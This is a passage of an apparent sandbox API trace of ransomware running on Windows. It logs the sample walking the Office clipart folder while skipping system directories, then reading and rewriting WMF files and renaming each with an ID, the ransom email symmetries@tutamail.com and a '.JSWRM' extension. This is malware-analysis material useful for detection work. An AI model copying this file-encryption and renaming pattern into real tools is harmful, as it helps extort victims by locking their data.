out: lpWideCharStr=0x0) returned 24 [0082.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0082.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0082.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0082.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0082.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0082.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.146] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107342.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107342.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0082.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0082.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0082.147] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13d4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107344.WMF", cAlternateFileName="")) returned 1 [0082.147] lstrcmpiW (lpString1="J0107344.WMF", lpString2=".") returned 1 [0082.147] lstrcmpiW (lpString1="J0107344.WMF", lpString2="..") returned 1 [0082.147] lstrcmpiW (lpString1="J0107344.WMF", lpString2="...") returned 1 [0082.147] lstrcmpiW (lpString1="J0107344.WMF", lpString2="windows") returned -1 [0082.147] lstrcmpiW (lpString1="J0107344.WMF", lpString2="recovery") returned -1 [0082.147] lstrcmpiW (lpString1="J0107344.WMF", lpString2="perflogs") returned -1 [0082.147] lstrcmpiW (lpString1="J0107344.WMF", lpString2="documents and settings") returned 1 [0082.147] lstrcmpiW (lpString1="J0107344.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.147] lstrcmpiW (lpString1="J0107344.WMF", lpString2="system volume information") returned -1 [0082.147] lstrcmpiW (lpString1="J0107344.WMF", lpString2="msocache") returned -1 [0082.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0082.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107344.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107344.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107344.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0082.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0082.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107344.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107344.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107344.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0082.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0082.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0082.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0082.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107344.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.148] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5076) returned 1 [0082.148] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13d0) returned 0x205850 [0082.148] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x13d0, lpOverlapped=0x0) returned 1 [0082.150] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.150] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x13d0, lpOverlapped=0x0) returned 1 [0082.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.150] CloseHandle (hObject=0x314) returned 1 [0082.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0082.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0082.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0082.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0082.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0082.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0082.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.151] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107344.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107344.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0082.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0082.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0082.151] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5c78, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107350.WMF", cAlternateFileName="")) returned 1 [0082.151] lstrcmpiW (lpString1="J0107350.WMF", lpString2=".") returned 1 [0082.151] lstrcmpiW (lpString1="J0107350.WMF", lpString2="..") returned 1 [0082.151] lstrcmpiW (lpString1="J0107350.WMF", lpString2="...") returned 1 [0082.151] lstrcmpiW (lpString1="J0107350.WMF", lpString2="windows") returned -1 [0082.151] lstrcmpiW (lpString1="J0107350.WMF", lpString2="recovery") returned -1 [0082.151] lstrcmpiW (lpString1="J0107350.WMF", lpString2="perflogs") returned -1 [0082.151] lstrcmpiW (lpString1="J0107350.WMF", lpString2="documents and settings") returned 1 [0082.152] lstrcmpiW (lpString1="J0107350.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.152] lstrcmpiW (lpString1="J0107350.WMF", lpString2="system volume information") returned -1 [0082.152] lstrcmpiW (lpString1="J0107350.WMF", lpString2="msocache") returned -1 [0082.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0082.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107350.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107350.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107350.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0082.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0082.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107350.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107350.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107350.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0082.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0082.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0082.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0082.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107350.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.152] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23672) returned 1 [0082.152] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5c70) returned 0x24d210 [0082.152] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5c70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5c70, lpOverlapped=0x0) returned 1 [0082.155] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.155] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5c70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5c70, lpOverlapped=0x0) returned 1 [0082.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.155] CloseHandle (hObject=0x314) returned 1 [0082.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0082.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0082.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0082.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0082.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0082.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0082.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.156] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107350.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107350.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0082.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0082.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0082.157] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6e9e74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6e9e74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f1c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107358.WMF", cAlternateFileName="")) returned 1 [0082.157] lstrcmpiW (lpString1="J0107358.WMF", lpString2=".") returned 1 [0082.157] lstrcmpiW (lpString1="J0107358.WMF", lpString2="..") returned 1 [0082.157] lstrcmpiW (lpString1="J0107358.WMF", lpString2="...") returned 1 [0082.157] lstrcmpiW (lpString1="J0107358.WMF", lpString2="windows") returned -1 [0082.157] lstrcmpiW (lpString1="J0107358.WMF", lpString2="recovery") returned -1 [0082.157] lstrcmpiW (lpString1="J0107358.WMF", lpString2="perflogs") returned -1 [0082.157] lstrcmpiW (lpString1="J0107358.WMF", lpString2="documents and settings") returned 1 [0082.157] lstrcmpiW (lpString1="J0107358.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.157] lstrcmpiW (lpString1="J0107358.WMF", lpString2="system volume information") returned -1 [0082.157] lstrcmpiW (lpString1="J0107358.WMF", lpString2="msocache") returned -1 [0082.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0082.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107358.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107358.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107358.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0082.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0082.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107358.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107358.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107358.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0082.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0082.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0082.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0082.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107358.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.240] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7964) returned 1 [0082.241] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f10) returned 0x205850 [0082.241] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1f10, lpOverlapped=0x0) returned 1 [0082.242] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.242] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f10, lpOverlapped=0x0) returned 1 [0082.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.243] CloseHandle (hObject=0x314) returned 1 [0082.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0082.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0082.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0082.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0082.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0082.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0082.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.243] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107358.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107358.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0082.244] HeapFree (in: 